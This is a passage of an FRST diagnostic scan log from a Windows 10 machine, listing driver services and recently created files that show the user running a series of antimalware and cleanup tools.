U3 QWAVEdrv; C:\WINDOWS\system32\drivers\qwavedrv.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAcd; C:\WINDOWS\System32\DRIVERS\rasacd.sys [17408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAgileVpn; C:\WINDOWS\System32\drivers\AgileVpn.sys [107520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Rasl2tp; C:\WINDOWS\System32\drivers\rasl2tp.sys [104960 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasPppoe; C:\WINDOWS\System32\DRIVERS\raspppoe.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasSstp; C:\WINDOWS\System32\drivers\rassstp.sys [77824 2016-07-16] (Microsoft Corporation) [File not signed]
U1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32568 2015-08-15] (EldoS Corporation)
U3 rdpbus; C:\WINDOWS\System32\drivers\rdpbus.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RDPDR; C:\WINDOWS\System32\drivers\rdpdr.sys [177152 2016-07-16] (Microsoft Corporation) [File not signed]
U2 rspndr; C:\WINDOWS\System32\drivers\rspndr.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek )
U3 s3cap; C:\WINDOWS\System32\drivers\vms3cap.sys [9216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scfilter; C:\WINDOWS\System32\DRIVERS\scfilter.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scmdisk0101; C:\WINDOWS\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serenum; C:\WINDOWS\System32\drivers\serenum.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serial; C:\WINDOWS\System32\drivers\serial.sys [83968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sermouse; C:\WINDOWS\System32\drivers\sermouse.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sfloppy; C:\WINDOWS\System32\drivers\sfloppy.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U2 srv; C:\WINDOWS\System32\DRIVERS\srv.sys [410112 2017-03-04] (Microsoft Corporation) [File not signed]
U3 srv2; C:\WINDOWS\System32\DRIVERS\srv2.sys [713216 2016-11-11] (Microsoft Corporation) [File not signed]
U3 srvnet; C:\WINDOWS\System32\DRIVERS\srvnet.sys [248320 2016-09-27] (Microsoft Corporation) [File not signed]
U2 storqosflt; C:\WINDOWS\System32\drivers\storqosflt.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Synth3dVsc; C:\WINDOWS\System32\drivers\Synth3dVsc.sys [64000 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tcpipreg; C:\WINDOWS\System32\drivers\tcpipreg.sys [52224 2017-03-04] (Microsoft Corporation) [File not signed]
U3 tsusbflt; C:\WINDOWS\System32\drivers\TsUsbFlt.sys [61440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TsUsbGD; C:\WINDOWS\System32\drivers\TsUsbGD.sys [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U3 tunnel; C:\WINDOWS\System32\drivers\tunnel.sys [158208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmCx0101; C:\WINDOWS\System32\Drivers\UcmCx.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmTcpciCx0101; C:\WINDOWS\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmUcsi; C:\WINDOWS\System32\drivers\UcmUcsi.sys [50688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UdeCx; C:\WINDOWS\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation) [File not signed]
U4 udfs; C:\WINDOWS\System32\DRIVERS\udfs.sys [320000 2016-07-16] (Microsoft Corporation) [File not signed]
U3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmPass; C:\WINDOWS\System32\drivers\umpass.sys [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbaudio; C:\WINDOWS\system32\drivers\usbaudio.sys [132096 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbcir; C:\WINDOWS\System32\drivers\usbcir.sys [102400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbohci; C:\WINDOWS\System32\drivers\usbohci.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbprint; C:\WINDOWS\System32\drivers\usbprint.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbser; C:\WINDOWS\System32\drivers\usbser.sys [69120 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbuhci; C:\WINDOWS\System32\drivers\usbuhci.sys [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbvideo; C:\WINDOWS\System32\Drivers\usbvideo.sys [226816 2016-09-27] (Microsoft Corporation) [File not signed]
U3 vhf; C:\WINDOWS\System32\drivers\vhf.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 VMBusHID; C:\WINDOWS\System32\drivers\VMBusHID.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vmgid; C:\WINDOWS\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vwifibus; C:\WINDOWS\System32\drivers\vwifibus.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
U1 vwififlt; C:\WINDOWS\System32\drivers\vwififlt.sys [73216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WacomPen; C:\WINDOWS\System32\drivers\wacompen.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wanarp; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wanarpv6; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wcnfs; C:\WINDOWS\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
U3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
U3 wdiwifi; C:\WINDOWS\System32\DRIVERS\wdiwifi.sys [719872 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wdm_usb; C:\WINDOWS\system32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
U3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)
U3 WINUSB; C:\WINDOWS\System32\drivers\WinUSB.SYS [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WmiAcpi; C:\WINDOWS\System32\drivers\wmiacpi.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U4 ws2ifsl; C:\WINDOWS\system32\drivers\ws2ifsl.sys [22528 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WudfPf; C:\WINDOWS\System32\drivers\WudfPf.sys [99328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFRd; C:\WINDOWS\System32\drivers\WudfRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdFs; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdMtp; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 xboxgip; C:\WINDOWS\System32\drivers\xboxgip.sys [258560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 xinputhid; C:\WINDOWS\System32\drivers\xinputhid.sys [43520 2016-09-27] (Microsoft Corporation) [File not signed]
U3 xusb22; C:\WINDOWS\System32\drivers\xusb22.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ekswxtuc; \??\C:\WINDOWS\system32\drivers\ekswxtuc.sys [X]
U1 xlkgrbft; \??\C:\WINDOWS\system32\drivers\xlkgrbft.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-16 16:40 - 2017-03-16 16:41 - 00042454 _____ C:\Users\Nekut\Desktop\Addition.txt
2017-03-16 16:38 - 2017-03-16 16:46 - 00062427 _____ C:\Users\Nekut\Desktop\FRST.txt
2017-03-16 16:34 - 2017-03-16 16:46 - 00000000 ____D C:\FRST
2017-03-16 16:34 - 2017-03-16 16:34 - 02424832 _____ (Farbar) C:\Users\Nekut\Desktop\FRST64.exe
2017-03-16 16:34 - 2017-03-16 16:34 - 00001956 _____ C:\WINDOWS\system32\Drivers\fvstore.dat
2017-03-16 16:34 - 2017-03-16 16:34 - 00000000 ___HD C:\VTRoot
2017-03-16 16:21 - 2017-03-16 16:47 - 00024411 _____ C:\WINDOWS\ZAM.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:47 - 00014878 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00001223 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Users\Nekut\AppData\Local\Zemana
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2017-03-16 16:20 - 2017-03-16 16:20 - 05755024 _____ (Zemana Ltd. ) C:\Users\Nekut\Downloads\Zemana.AntiMalware.Setup.exe
2017-03-15 22:01 - 2017-03-16 16:38 - 01038464 _____ C:\WINDOWS\system32\Drivers\sfi.dat
2017-03-15 22:01 - 2017-03-15 22:01 - 00001904 _____ C:\Users\Public\Desktop\COMODO Internet Security.lnk
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\WINDOWS\System32\Tasks\COMODO
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\COMODO
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Shared Space
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo Downloader
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\Program Files\COMODO
2017-03-15 21:58 - 2017-03-15 21:59 - 73804768 _____ (COMODO) C:\Users\Nekut\Downloads\cispremium_only_installer.exe
2017-03-15 21:55 - 2017-03-15 21:55 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-03-15 21:23 - 2017-03-15 21:58 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-03-15 21:18 - 2017-03-15 21:18 - 00000000 ____D C:\ProgramData\ProcessLasso
2017-03-15 21:10 - 2017-03-15 21:00 - 00024064 _____ C:\WINDOWS\zoek-delete.exe
2017-03-15 21:00 - 2017-03-15 21:09 - 00000000 ____D C:\zoek_backup
2017-03-15 20:59 - 2017-03-15 21:00 - 01309184 _____ C:\Users\Nekut\Downloads\zoek.exe
2017-03-15 20:55 - 2017-03-15 20:55 - 00000000 ____D C:\Users\Nekut\AppData\Local\Adobe
2017-03-15 19:40 - 2017-03-15 20:15 - 03182592 _____ C:\Users\Nekut\Downloads\Nabozenstvi.ppt
2017-03-15 19:35 - 2017-03-15 19:35 - 02073600 _____ C:\Users\Nekut\Downloads\DUM_cihakova_Svetova_nabozenstvi.ppt
2017-03-15 18:32 - 2017-03-15 20:26 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-03-15 18:32 - 2017-03-15 18:59 - 00000000 ____D C:\ProgramData\RogueKiller
2017-03-15 18:30 - 2017-03-15 18:31 - 26131528 _____ C:\Users\Nekut\Downloads\RogueKillerX64.exe
2017-03-15 18:17 - 2017-03-15 18:17 - 00000000 ____D C:\ProgramData\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00002775 _____ C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\Program Files (x86)\Sophos
2017-03-15 18:12 - 2017-03-15 18:16 - 164051504 _____ (Sophos Limited) C:\Users\Nekut\Downloads\Sophos Virus Removal Tool.exe
2017-03-15 17:57 - 2017-03-15 17:58 - 01663904 _____ (Malwarebytes) C:\Users\Nekut\Downloads\JRT.exe
2017-03-15 17:31 - 2017-03-15 21:58 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-03-15 17:30 - 2017-03-16 16:46 - 00092088 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00251840 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-03-15 17:30 - 2017-03-15 17:30 - 00001918 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\Program Files\Malwarebytes
2017-03-15 17:30 - 2017-02-24 06:23 - 00077408 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-03-15 17:28 - 2017-03-15 17:29 - 57131432 _____ (Malwarebytes ) C:\Users\Nekut\Downloads\mb3-setup-consumer-3.0.6.1469-1075.exe
2017-03-15 17:23 - 2017-03-15 17:51 - 00000000 ____D C:\AdwCleaner
2017-03-15 17:22 - 2017-03-15 17:23 - 04031440 _____ C:\Users\Nekut\Desktop\AdwCleaner.exe
2017-03-15 17:14 - 2017-03-15 17:14 - 00448512 _____ (OldTimer Tools) C:\Users\Nekut\Downloads\TFC.exe
2017-03-15 17:09 - 2017-03-15 17:10 - 00050688 _____ (Atribune.org) C:\Users\Nekut\Downloads\ATF-Cleaner.exe
2017-03-14 19:18 - 2017-03-14 19:18 - 00388608 _____ (Trend Micro Inc.) C:\Users\Nekut\Downloads\HijackThis.exe
2017-03-14 18:36 - 2017-03-04 08:57 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-03-14 18:36 - 2017-03-04 08:57 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-03-14 18:36 - 2017-03-04 08:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2017-03-14 18:36 - 2017-03-04 08:24 - 00090976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IPMIDrv.sys
2017-03-14 18:36 - 2017-03-04 08:09 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 00497416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-03-14 18:36 - 2017-03-04 08:08 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-03-14 18:36 - 2017-03-04 08:07 - 00557400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-03-14 18:36 - 2017-03-04 08:04 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-03-14 18:36 - 2017-03-04 08:02 - 00184416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IPHLPAPI.DLL
2017-03-14 18:36 - 2017-03-04 07:56 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-03-14 18:36 - 2017-03-04 07:56 - 00248992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 02277288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 00524776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00781152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00493912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00313568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00549088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-03-14 18:36 - 2017-03-04 07:50 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 06667528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 04023000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01853224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01202384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01123912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00981376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00976184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00530480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00374448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00352760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-03-14 18:36 - 2017-03-04 07:46 - 04312248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-03-14 18:36 - 2017-03-04 07:46 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2017-03-14 18:36 - 2017-03-04 07:45 - 00173408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-03-14 18:36 - 2017-03-04 07:45 - 00112120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpapi.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01415240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01260784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-03-14 18:36 - 2017-03-04 07:42 - 00276832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\input.dll
2017-03-14 18:36 - 2017-03-04 07:40 - 00306800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2017-03-14 18:36 - 2017-03-04 07:36 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-03-14 18:36 - 2017-03-04 07:34 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-03-14 18:36 - 2017-03-04 07:30 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-03-14 18:36 - 2017-03-04 07:30 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-03-14 18:36 - 2017-03-04 07:30 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-03-14 18:36 - 2017-03-04 07:28 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe
2017-03-14 18:36 - 2017-03-04 07:25 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCCSEngineShared.dll
2017-03-14 18:36 - 2017-03-04 07:25 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-03-14 18:36 - 2017-03-04 07:23 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiohlp.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 01299968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\icm32.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFilterHost.exe
2017-03-14 18:36 - 2017-03-04 07:21 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
